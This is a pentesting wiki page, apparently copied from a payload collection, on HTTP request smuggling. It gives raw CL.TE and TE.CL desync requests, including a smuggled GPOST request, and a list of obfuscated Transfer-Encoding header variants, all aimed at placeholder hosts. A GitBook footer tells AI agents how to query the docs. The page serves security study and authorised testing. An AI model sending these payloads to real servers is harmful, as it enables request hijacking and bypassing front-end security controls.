> For the complete documentation index, see [llms.txt](https://notes.brinkles.wiki/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://notes.brinkles.wiki/tools/web-app-pentesting/payload-all-the-things/request-smuggling.md). # Request Smuggling ## Summary * [Tools](broken://pages/LT6Ba2gIythVrQntAifq) * [CL.TE vulnerabilities](broken://pages/LT6Ba2gIythVrQntAifq) * [TE.CL vulnerabilities](broken://pages/LT6Ba2gIythVrQntAifq) * [TE.TE behavior: obfuscating the TE header](broken://pages/LT6Ba2gIythVrQntAifq) * [References](broken://pages/LT6Ba2gIythVrQntAifq) ## Tools * [HTTP Request Smuggler / BApp Store](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646) * [Smuggler](https://github.com/defparam/smuggler) ## CL.TE vulnerabilities > The front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header. ```powershell POST / HTTP/1.1 Host: vulnerable-website.com Content-Length: 13 Transfer-Encoding: chunked 0 SMUGGLED ``` Example: ```powershell POST / HTTP/1.1 Host: domain.example.com Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 6 Transfer-Encoding: chunked 0 G ``` Challenge: ## TE.CL vulnerabilities > The front-end server uses the Transfer-Encoding header and the back-end server uses the Content-Length header. ```powershell POST / HTTP/1.1 Host: vulnerable-website.com Content-Length: 3 Transfer-Encoding: chunked 8 SMUGGLED 0 ``` Example: ```powershell POST / HTTP/1.1 Host: domain.example.com User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Content-Length: 4 Connection: close Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0 ``` :warning: To send this request using Burp Repeater, you will first need to go to the Repeater menu and ensure that the "Update Content-Length" option is unchecked.You need to include the trailing sequence \r\n\r\n following the final 0. Challenge: ## TE.TE behavior: obfuscating the TE header > The front-end and back-end servers both support the Transfer-Encoding header, but one of the servers can be induced not to process it by obfuscating the header in some way. ```powershell Transfer-Encoding: xchunked Transfer-Encoding : chunked Transfer-Encoding: chunked Transfer-Encoding: x Transfer-Encoding:[tab]chunked [space]Transfer-Encoding: chunked X: X[\n]Transfer-Encoding: chunked Transfer-Encoding : chunked ``` Challenge: ## References * [PortSwigger - Request Smuggling Tutorial](https://portswigger.net/web-security/request-smuggling) and [PortSwigger - Request Smuggling Reborn](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn) * [A Pentester's Guide to HTTP Request Smuggling - Busra Demir - 2020, October 16](https://blog.cobalt.io/a-pentesters-guide-to-http-request-smuggling-8b7bf0db1f0) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://notes.brinkles.wiki/tools/web-app-pentesting/payload-all-the-things/request-smuggling.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.